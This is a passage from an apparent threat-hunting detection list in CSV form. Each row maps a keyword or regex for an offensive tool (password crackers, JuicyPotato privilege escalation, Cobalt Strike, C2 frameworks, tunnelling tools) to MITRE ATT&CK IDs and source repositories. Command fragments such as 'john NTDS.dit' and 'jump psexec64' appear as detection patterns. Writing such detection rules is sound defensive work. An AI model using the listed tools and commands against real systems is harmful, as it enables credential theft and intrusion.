Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-incremental *",".{0,1000}john\s.{0,1000}\-incremental\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-shells*",".{0,1000}john\s.{0,1000}\-shells.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-show*",".{0,1000}john\s.{0,1000}\-show.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-single*",".{0,1000}john\s.{0,1000}\-single.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-users*",".{0,1000}john\s.{0,1000}\-users.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-wordlist*",".{0,1000}john\s.{0,1000}\-wordlist.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *--wordlist*",".{0,1000}john\s.{0,1000}\-\-wordlist.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john --format=*",".{0,1000}john\s\-\-format\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*john hashes*",".{0,1000}john\shashes.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john NTDS.dit*",".{0,1000}john\sNTDS\.dit.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john --show *",".{0,1000}john\s\-\-show\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john --status*",".{0,1000}john\s\-\-status.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*John the Ripper*",".{0,1000}John\sthe\sRipper.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john --wordlist*",".{0,1000}john\s\-\-wordlist.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john --wordlist=*",".{0,1000}john\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*John*the*Ripper*",".{0,1000}John.{0,1000}the.{0,1000}Ripper.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john.bash_completion*",".{0,1000}john\.bash_completion.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john.session.log*",".{0,1000}john\.session\.log.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john.zsh_completion*",".{0,1000}john\.zsh_completion.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john/password.lst*",".{0,1000}john\/password\.lst.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*john/run/fuzz.dic*",".{0,1000}john\/run\/fuzz\.dic.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john/src/ztex/*",".{0,1000}john\/src\/ztex\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john@moozle.wtf*",".{0,1000}john\@moozle\.wtf.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*john_crack_asrep*",".{0,1000}john_crack_asrep.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*john_crack_kerberoast*",".{0,1000}john_crack_kerberoast.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*john_log_format*",".{0,1000}john_log_format.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john_mpi.c*",".{0,1000}john_mpi\.c.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john_register_all*",".{0,1000}john_register_all.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*JohnTheRipper *",".{0,1000}JohnTheRipper\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*JohnTheRipper/*",".{0,1000}JohnTheRipper\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*JohnWoodman/stealthInjector*",".{0,1000}JohnWoodman\/stealthInjector.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*Jomungand\vstudio-project*",".{0,1000}Jomungand\\vstudio\-project.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*Jomungand-main*",".{0,1000}Jomungand\-main.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*joomscan -u *",".{0,1000}joomscan\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*joomscan*",".{0,1000}joomscan.{0,1000}","offensive_tool_keyword","joomscan","Joomla Vulnerability Scanner.","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/rezasp/joomscan","1","0","N/A","N/A","10","1016","242","2024-04-21T13:09:15Z","2016-09-01T09:06:17Z" "*Jormungand.exe*",".{0,1000}Jormungand\.exe.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*Jormungand.vcxproj*",".{0,1000}Jormungand\.vcxproj.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*Jormungandr.cpp*",".{0,1000}Jormungandr\.cpp.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*Jormungandr.exe*",".{0,1000}Jormungandr\.exe.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*Jormungandr-master*",".{0,1000}Jormungandr\-master.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*journalctl -u isc-dhcp-server.service | tail -n 50*",".{0,1000}journalctl\s\-u\sisc\-dhcp\-server\.service\s\|\stail\s\-n\s50.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*JPCERTCC*",".{0,1000}JPCERTCC.{0,1000}","offensive_tool_keyword","Github Username","github repo name containing multiple tools for log exploitation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/JPCERTCC","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*JPG0mez/ADCSync*",".{0,1000}JPG0mez\/ADCSync.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*jpillora/chisel*",".{0,1000}jpillora\/chisel.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*jquery-c2.*.profile*",".{0,1000}jquery\-c2\..{0,1000}\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*js-cracker-client/cracker.js*",".{0,1000}js\-cracker\-client\/cracker\.js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*JScriptStager*",".{0,1000}JScriptStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*jtee43gt-6543-2iur-9422-83r5w27hgzaq*",".{0,1000}jtee43gt\-6543\-2iur\-9422\-83r5w27hgzaq.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*juicycreds_dump*",".{0,1000}juicycreds_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*JuicyPotato.sln*",".{0,1000}JuicyPotato\.sln.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*JuicyPotato.vcxproj*",".{0,1000}JuicyPotato\.vcxproj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*juicypotato.x64.dll*",".{0,1000}juicypotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*juicypotato.x86.dll*",".{0,1000}juicypotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*juicypotato_reflective.dll*",".{0,1000}juicypotato_reflective\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*JuicyPotatoNG.cpp*",".{0,1000}JuicyPotatoNG\.cpp.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG.exe*",".{0,1000}JuicyPotatoNG\.exe.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG.sln*",".{0,1000}JuicyPotatoNG\.sln.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG.txt*",".{0,1000}JuicyPotatoNG\.txt.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG.zip*",".{0,1000}JuicyPotatoNG\.zip.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG-main*",".{0,1000}JuicyPotatoNG\-main.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*jump psexec_psh*",".{0,1000}jump\spsexec_psh.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump psexec64*",".{0,1000}jump\spsexec64.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 